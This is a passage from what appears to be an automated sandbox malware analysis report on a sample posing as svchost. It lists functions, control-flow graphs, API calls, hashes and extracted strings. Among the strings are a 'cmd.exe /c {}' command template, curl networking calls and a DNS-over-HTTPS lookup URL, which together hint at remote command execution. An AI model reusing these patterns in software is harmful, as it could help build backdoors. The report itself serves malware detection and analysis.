                                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB0567D1
                                                                                              • VirtualProtect.KERNEL32 ref: 00007FFBAB05682D
                                                                                              • VirtualProtect.KERNEL32 ref: 00007FFBAB05685E
                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB0568A2
                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB0568AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                              • API String ID: 740688525-1880043860
                                                                                              • Opcode ID: ab76589d6c54d6a326f523da88ed150cb661493434ef03a6b2d42ed5dbc1533e
                                                                                              • Instruction ID: 650b576496bfc516ef3dc0deca0626b52e751d5f796ffc86fe9f5a6911828912
                                                                                              • Opcode Fuzzy Hash: ab76589d6c54d6a326f523da88ed150cb661493434ef03a6b2d42ed5dbc1533e
                                                                                              • Instruction Fuzzy Hash: AC51A2A1B0AB4681EA769B76E4109B96354BF48BB0F48C735DE3D47BE4DF3CE4658200
                                                                                              Function 00007FFBAAFE8390 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 283COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 698 7ffbaafe8390-7ffbaafe83c5 699 7ffbaafe87b4 698->699 700 7ffbaafe83cb-7ffbaafe83d2 call 7ffbaafe82a0 698->700 702 7ffbaafe87b6-7ffbaafe87dd call 7ffbab03b0f0 699->702 700->699 705 7ffbaafe83d8-7ffbaafe83f5 700->705 707 7ffbaafe83fa-7ffbaafe8484 call 7ffbaafd8370 call 7ffbaafe6f10 705->707 708 7ffbaafe83f7 705->708 712 7ffbaafe8489-7ffbaafe8493 707->712 708->707 713 7ffbaafe84c7-7ffbaafe84e2 712->713 714 7ffbaafe8495-7ffbaafe84a7 712->714 715 7ffbaafe84e8-7ffbaafe8513 call 7ffbaafe9780 713->715 716 7ffbaafe8775-7ffbaafe8781 713->716 717 7ffbaafe84a9-7ffbaafe84bc 714->717 718 7ffbaafe84c2 call 7ffbab03b110 714->718 728 7ffbaafe8519-7ffbaafe8535 715->728 729 7ffbaafe875f-7ffbaafe8774 call 7ffbaafe8f80 715->729 716->699 721 7ffbaafe8783-7ffbaafe8798 716->721 717->718 722 7ffbaafe87de-7ffbaafe87e3 call 7ffbab049cd4 717->722 718->713 724 7ffbaafe879a-7ffbaafe87ad 721->724 725 7ffbaafe87af call 7ffbab03b110 721->725 732 7ffbaafe87e4-7ffbaafe87e9 call 7ffbab049cd4 722->732 724->725 730 7ffbaafe87f0-7ffbaafe880b call 7ffbab049cd4 724->730 725->699 734 7ffbaafe8597-7ffbaafe859b 728->734 735 7ffbaafe8537 728->735 729->716 747 7ffbaafe881f-7ffbaafe8823 730->747 748 7ffbaafe880d-7ffbaafe8818 curl_global_init 730->748 749 7ffbaafe87ea-7ffbaafe87ef call 7ffbab049cd4 732->749 734->729 740 7ffbaafe85a1-7ffbaafe85ae 734->740 739 7ffbaafe8540-7ffbaafe854d 735->739 743 7ffbaafe8552-7ffbaafe856a call 7ffbab06a8b0 739->743 744 7ffbaafe854f 739->744 745 7ffbaafe85b3-7ffbaafe85cc call 7ffbab06a8b0 740->745 746 7ffbaafe85b0 740->746 756 7ffbaafe8572-7ffbaafe8575 743->756 757 7ffbaafe856c 743->757 744->743 758 7ffbaafe85d4-7ffbaafe85d8 745->758 759 7ffbaafe85ce 745->759 746->745 748->747 749->730 764 7ffbaafe8576-7ffbaafe857a 756->764 765 7ffbaafe857b 756->765 762 7ffbaafe857d-7ffbaafe8587 757->762 763 7ffbaafe856e-7ffbaafe8571 757->763 760 7ffbaafe85da-7ffbaafe85dc 758->760 761 7ffbaafe85de 758->761 766 7ffbaafe85e0 759->766 767 7ffbaafe85d0-7ffbaafe85d2 759->767 768 7ffbaafe85e2-7ffbaafe85e4 760->768 761->766 769 7ffbaafe85ea-7ffbaafe85ed 761->769 772 7ffbaafe858f-7ffbaafe8593 762->772 763->756 764->765 770 7ffbaafe8589-7ffbaafe858c 765->770 771 7ffbaafe857c 765->771 766->768 767->768 768->729 768->769 769->729 774 7ffbaafe85f3-7ffbaafe86b4 call 7ffbaafc3ff0 call 7ffbaafeac90 call 7ffbaafe8ad0 call 7ffbaafc3ff0 call 7ffbaafeac90 call 7ffbaaff25f0 call 7ffbaafce610 769->774 770->772 771->762 772->739 775 7ffbaafe8595 772->775 790 7ffbaafe86e9-7ffbaafe870b call 7ffbaafe8f80 774->790 791 7ffbaafe86b6-7ffbaafe86c8 774->791 775->734 798 7ffbaafe8742-7ffbaafe875d 790->798 799 7ffbaafe870d-7ffbaafe8722 790->799 792 7ffbaafe86ca-7ffbaafe86dd 791->792 793 7ffbaafe86e3-7ffbaafe86e8 call 7ffbab03b110 791->793 792->732 792->793 793->790 798->702 800 7ffbaafe8724-7ffbaafe8737 799->800 801 7ffbaafe873d call 7ffbab03b110 799->801 800->749 800->801 801->798
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$curl_global_init
                                                                                              • String ID: "$Answer$data$https://dns.google/resolve?name={}
                                                                                              • API String ID: 3819036960-82038468
                                                                                              • Opcode ID: 59bb28103cee1aee3c5fad7c54ddbac10d2075a140da29ac5d0c9250a1f0ef03
                                                                                              • Instruction ID: ac7e979f8a7e9e70570249a66f86837a5ec24a140cc496a9bb706a6e2c09d056
                                                                                              • Opcode Fuzzy Hash: 59bb28103cee1aee3c5fad7c54ddbac10d2075a140da29ac5d0c9250a1f0ef03
                                                                                              • Instruction Fuzzy Hash: EFC115A2E0E7C681EA369B34E4403BA6351FB86794F108232DE9D436E9DF7DD082C750
                                                                                              Function 00007FFBAAFE7A70 Relevance: 15.2, APIs: 10, Instructions: 182COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: curl_easy_setopt$_invalid_parameter_noinfo_noreturncurl_easy_performcurl_easy_strerror
                                                                                              • String ID:
                                                                                              • API String ID: 496898497-0
                                                                                              • Opcode ID: dbe63b870c19d87e2bb359bceb4f8389c0c2a63cf7250fc1c60ffc9ca98cd2ef
                                                                                              • Instruction ID: 5cb87b2bf76d9226ca00cf503bb8d1c2c509487536a6c5ab20f13e916aa7e77b
                                                                                              • Opcode Fuzzy Hash: dbe63b870c19d87e2bb359bceb4f8389c0c2a63cf7250fc1c60ffc9ca98cd2ef
                                                                                              • Instruction Fuzzy Hash: 1F71E3A2F09A85C2EB258B35E44437DA361FB85BD4F108231DEAD47BA5DF7DE4828740
                                                                                              Function 00007FFBAB011680 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 151processsynchronizationCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreateObjectProcessSingleWait_invalid_parameter_noinfo_noreturn
                                                                                              • String ID: cmd.exe /c {}
                                                                                              • API String ID: 3882512363-3162138867
                                                                                              • Opcode ID: d137653e5bb499d1f3ac429a0c12489c16ab699fb9fefba6721ffb36d19b4ffd
                                                                                              • Instruction ID: 740f8d3f2f06782dfd5b1ab90b915cd0c08fe53d96b47e56fca752eb52a6a75b
                                                                                              • Opcode Fuzzy Hash: d137653e5bb499d1f3ac429a0c12489c16ab699fb9fefba6721ffb36d19b4ffd
                                                                                              • Instruction Fuzzy Hash: 3161C372E19B8586E7158F74E8403ADB3B4FB94758F108236EEAC13A68DF78D095C740
                                                                                              Function 00007FFBAB05D6EC Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 952 7ffbab05d6ec-7ffbab05d712 953 7ffbab05d72d-7ffbab05d731 952->953 954 7ffbab05d714-7ffbab05d728 call 7ffbab049864 call 7ffbab049888 952->954 956 7ffbab05d737-7ffbab05d73e 953->956 957 7ffbab05db19-7ffbab05db25 call 7ffbab049864 call 7ffbab049888 953->957 968 7ffbab05db30 954->968 956->957 960 7ffbab05d744-7ffbab05d772 956->960 974 7ffbab05db2b call 7ffbab049cb4 957->974 960->957 962 7ffbab05d778-7ffbab05d77f 960->962 966 7ffbab05d781-7ffbab05d793 call 7ffbab049864 call 7ffbab049888 962->966 967 7ffbab05d798-7ffbab05d79b 962->967 966->974 971 7ffbab05d7a1-7ffbab05d7a7 967->971 972 7ffbab05db15-7ffbab05db17 967->972 973 7ffbab05db33-7ffbab05db4a 968->973 971->972 976 7ffbab05d7ad-7ffbab05d7b0 971->976 972->973 974->968 976->966 977 7ffbab05d7b2-7ffbab05d7d7 976->977 980 7ffbab05d80a-7ffbab05d811 977->980 981 7ffbab05d7d9-7ffbab05d7db 977->981 985 7ffbab05d813-7ffbab05d83b call 7ffbab055d50 call 7ffbab055cf0 * 2 980->985 986 7ffbab05d7e6-7ffbab05d7fd call 7ffbab049864 call 7ffbab049888 call 7ffbab049cb4 980->986 983 7ffbab05d802-7ffbab05d808 981->983 984 7ffbab05d7dd-7ffbab05d7e4 981->984 988 7ffbab05d888-7ffbab05d89f 983->988 984->983 984->986 1013 7ffbab05d83d-7ffbab05d853 call 7ffbab049888 call 7ffbab049864 985->1013 1014 7ffbab05d858-7ffbab05d883 call 7ffbab05ddc0 985->1014 1017 7ffbab05d99b 986->1017 991 7ffbab05d8a1-7ffbab05d8a9 988->991 992 7ffbab05d91a-7ffbab05d928 call 7ffbab066624 988->992 991->992 996 7ffbab05d8ab-7ffbab05d8ad 991->996 1004 7ffbab05d92e-7ffbab05d943 992->1004 1005 7ffbab05d9b9 992->1005 996->992 1001 7ffbab05d8af-7ffbab05d8c5 996->1001 1001->992 1006 7ffbab05d8c7-7ffbab05d8d3 1001->1006 1004->1005 1011 7ffbab05d945-7ffbab05d957 GetConsoleMode 1004->1011 1009 7ffbab05d9be-7ffbab05d9e5 ReadFile 1005->1009 1006->992 1007 7ffbab05d8d5-7ffbab05d8d7 1006->1007 1007->992 1012 7ffbab05d8d9-7ffbab05d8f1 1007->1012 1015 7ffbab05dadf-7ffbab05dae8 GetLastError 1009->1015 1016 7ffbab05d9eb-7ffbab05d9f3 1009->1016 1011->1005 1018 7ffbab05d959-7ffbab05d961 1011->1018 1012->992 1020 7ffbab05d8f3-7ffbab05d8ff 1012->1020 1013->1017 1014->988 1025 7ffbab05daea-7ffbab05db00 call 7ffbab049888 call 7ffbab049864 1015->1025 1026 7ffbab05db05-7ffbab05db08 1015->1026 1016->1015 1022 7ffbab05d9f9 1016->1022 1019 7ffbab05d99e-7ffbab05d9a8 call 7ffbab055cf0 1017->1019 1018->1009 1024 7ffbab05d963-7ffbab05d98c ReadConsoleW 1018->1024 1019->973 1020->992 1028 7ffbab05d901-7ffbab05d903 1020->1028 1032 7ffbab05da00-7ffbab05da15 1022->1032 1034 7ffbab05d98e GetLastError 1024->1034 1035 7ffbab05d9ad-7ffbab05d9b7 1024->1035 1025->1017 1030 7ffbab05db0e-7ffbab05db10 1026->1030 1031 7ffbab05d994-7ffbab05d996 call 7ffbab049818 1026->1031 1028->992 1039 7ffbab05d905-7ffbab05d915 1028->1039 1030->1019 1031->1017 1032->1019 1041 7ffbab05da17-7ffbab05da22 1032->1041 1034->1031 1035->1032 1039->992 1045 7ffbab05da49-7ffbab05da51 1041->1045 1046 7ffbab05da24-7ffbab05da3d call 7ffbab05d29c 1041->1046 1049 7ffbab05dacd-7ffbab05dada call 7ffbab05d0a0 1045->1049 1050 7ffbab05da53-7ffbab05da65 1045->1050 1052 7ffbab05da42-7ffbab05da44 1046->1052 1049->1052 1053 7ffbab05dac0-7ffbab05dac8 1050->1053 1054 7ffbab05da67 1050->1054 1052->1019 1053->1019 1055 7ffbab05da6c-7ffbab05da73 1054->1055 1057 7ffbab05daaf-7ffbab05daba 1055->1057 1058 7ffbab05da75-7ffbab05da79 1055->1058 1057->1053 1059 7ffbab05da7b-7ffbab05da82 1058->1059 1060 7ffbab05da95 1058->1060 1059->1060 1061 7ffbab05da84-7ffbab05da88 1059->1061 1062 7ffbab05da9b-7ffbab05daab 1060->1062 1061->1060 1063 7ffbab05da8a-7ffbab05da93 1061->1063 1062->1055 1064 7ffbab05daad 1062->1064 1063->1062 1064->1053
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 80580447bdf006c8bb099900400e9773724f3534977f34bb1017d48ee99cfaed
                                                                                              • Instruction ID: f8cb8a599dec6ef7621eab16ad795cde76102dccf9107c4320deb0099704ca43
                                                                                              • Opcode Fuzzy Hash: 80580447bdf006c8bb099900400e9773724f3534977f34bb1017d48ee99cfaed
                                                                                              • Instruction Fuzzy Hash: BBC1C2A290E78681E7729F25D440ABE6795EB80B80F55C336DE6D03BB1CE7CE8758300
                                                                                              Function 00007FFBAAFE5050 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                              • String ID:
                                                                                              • API String ID: 3053331623-0
                                                                                              • Opcode ID: 82f975a65af9a806176bc470929628a152f3e5129f63775cb722e992c27d5d3d
                                                                                              • Instruction ID: b01f35152e1bb75139c02283c75ccb799041d5cb3fc28ca4d5bc75f9fe8ac25f
                                                                                              • Opcode Fuzzy Hash: 82f975a65af9a806176bc470929628a152f3e5129f63775cb722e992c27d5d3d
                                                                                              • Instruction Fuzzy Hash: 0A31A0A2A1AA82C0EA779F35E44027A6765FB44B98F084176DE6E433B5DF3CE452C710
                                                                                              Function 00007FFBAB031C20 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 193COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1102 7ffbab031c20-7ffbab031c5e call 7ffbab06a340 1105 7ffbab031ee1-7ffbab031f1f call 7ffbaafc3fa0 call 7ffbab036b60 call 7ffbab03d5f0 1102->1105 1106 7ffbab031c64-7ffbab031c69 1102->1106 1127 7ffbab031f20-7ffbab031f25 call 7ffbab049cd4 1105->1127 1107 7ffbab031c6b-7ffbab031c6d 1106->1107 1108 7ffbab031c72-7ffbab031c8f call 7ffbab06a346 1106->1108 1110 7ffbab031eb4-7ffbab031ee0 call 7ffbab03b0f0 1107->1110 1116 7ffbab031c94-7ffbab031c97 1108->1116 1119 7ffbab031c9d-7ffbab031cca 1116->1119 1120 7ffbab031ea4-7ffbab031ea7 1116->1120 1124 7ffbab031cd0-7ffbab031cd8 1119->1124 1122 7ffbab031eb1 1120->1122 1123 7ffbab031ea9-7ffbab031eb0 1120->1123 1122->1110 1123->1122 1124->1124 1126 7ffbab031cda-7ffbab031d13 call 7ffbaafc3ff0 call 7ffbab0309d0 1124->1126 1138 7ffbab031d15-7ffbab031d2a 1126->1138 1139 7ffbab031d4a-7ffbab031d52 1126->1139 1133 7ffbab031f26-7ffbab031f3c call 7ffbab049cd4 call 7ffbab06a30a 1127->1133 1147 7ffbab031f41-7ffbab031f4b 1133->1147 1143 7ffbab031d2c-7ffbab031d3f 1138->1143 1144 7ffbab031d45 call 7ffbab03b110 1138->1144 1140 7ffbab031e78-7ffbab031e80 1139->1140 1141 7ffbab031d58-7ffbab031d7e 1139->1141 1148 7ffbab031e82-7ffbab031e89 1140->1148 1149 7ffbab031e8a-7ffbab031e9f #22 1140->1149 1146 7ffbab031d80-7ffbab031d88 1141->1146 1143->1127 1143->1144 1144->1139 1146->1146 1150 7ffbab031d8a-7ffbab031d97 call 7ffbaafc3ff0 1146->1150 1148->1149 1149->1116 1154 7ffbab031d98-7ffbab031da0 1150->1154 1155 7ffbab031da6-7ffbab031dea 1154->1155 1156 7ffbab031e34-7ffbab031e40 1154->1156 1164 7ffbab031e0e-7ffbab031e18 1155->1164 1165 7ffbab031dec-7ffbab031df4 1155->1165 1156->1140 1157 7ffbab031e42-7ffbab031e57 1156->1157 1158 7ffbab031e72-7ffbab031e77 call 7ffbab03b110 1157->1158 1159 7ffbab031e59-7ffbab031e6c 1157->1159 1158->1140 1159->1133 1159->1158 1164->1154 1166 7ffbab031e1e 1164->1166 1167 7ffbab031df6-7ffbab031dfa 1165->1167 1168 7ffbab031e09-7ffbab031e0c 1165->1168 1169 7ffbab031e20-7ffbab031e2d 1166->1169 1167->1168 1170 7ffbab031dfc-7ffbab031e07 1167->1170 1168->1154 1169->1169 1171 7ffbab031e2f 1169->1171 1170->1167 1170->1168 1171->1154
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                              • String ID: Connection lost.
                                                                                              • API String ID: 3668304517-320266476
                                                                                              • Opcode ID: 7aca4e8d22572d76c5586afddea96cb6605fa334417803e94f2f0df69a637177
                                                                                              • Instruction ID: a5bccb7ffb43681ae25d414cd8b4dffd935ecc431c93c5f320ee30f8909627ff
                                                                                              • Opcode Fuzzy Hash: 7aca4e8d22572d76c5586afddea96cb6605fa334417803e94f2f0df69a637177
                                                                                              • Instruction Fuzzy Hash: BA8194A3A0AAC681EA328B25E4443BD6360FB99B94F548231DE7D036E5DF7CD4A1D304
                                                                                              Function 00007FFBAAFE5830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                              • String ID: bad locale name
                                                                                              • API String ID: 2775327233-1405518554
                                                                                              • Opcode ID: 8a333eecea8e93983e7a0a6e804d82f444e606bc173281889031bde093c40606
                                                                                              • Instruction ID: 23a9739761ab2723130d015e5a50c2f3e11993b3350b7ddebbe27b6cd664da35
                                                                                              • Opcode Fuzzy Hash: 8a333eecea8e93983e7a0a6e804d82f444e606bc173281889031bde093c40606
                                                                                              • Instruction Fuzzy Hash: E2418A72B0BA41C9FB2ADF70D4903EC23A8EF44748F088479DE4D66A65CE38D926D354
                                                                                              Function 00007FFBAB05C068 Relevance: 6.2, APIs: 4, Instructions: 229COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFBAB069B09,?,00007FFBAB03B4B5,?), ref: 00007FFBAB05C186
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleMode
                                                                                              • String ID:
                                                                                              • API String ID: 4145635619-0
                                                                                              • Opcode ID: e1e0fba768d46928488142fd673c0963fb07b66bed77518fb1a117bd88da810a
                                                                                              • Instruction ID: 1f100848725154073238b8c26b1a2e32f9c4e2bb5bd7c0c8c09f5b0e8d5d9a56
                                                                                              • Opcode Fuzzy Hash: e1e0fba768d46928488142fd673c0963fb07b66bed77518fb1a117bd88da810a
                                                                                              • Instruction Fuzzy Hash: 7191D7B2A1A65585FB728F79D440ABD2BA0FB44B88F05C235DD2E57BA5CE3CE455C300
                                                                                              Function 00007FFBAB42EE40 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB443F40: ENGINE_finish.LIBCRYPTO-3-X64(?,00007FFBAB42EE67,?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB443F72
                                                                                              • ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE6C
                                                                                              • OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE73
                                                                                              • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE81
                                                                                              • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE89
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: E_finishJ_nid2snR_fetchR_pop_to_markR_set_mark
                                                                                              • String ID:
                                                                                              • API String ID: 3538331334-0
                                                                                              • Opcode ID: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                              • Instruction ID: 085dbc66ee4cbdc074be4445ffbb6a26548e7194780c535bd90709ff56e9c454
                                                                                              • Opcode Fuzzy Hash: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                              • Instruction Fuzzy Hash: F7F0A091B5A35242E966A7B2E48516D9555AF98FC0F08C438FE6D47BABEE2CE4410300
                                                                                              Function 00007FFBAAFEDCF0 Relevance: 3.8, APIs: 3, Instructions: 55sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
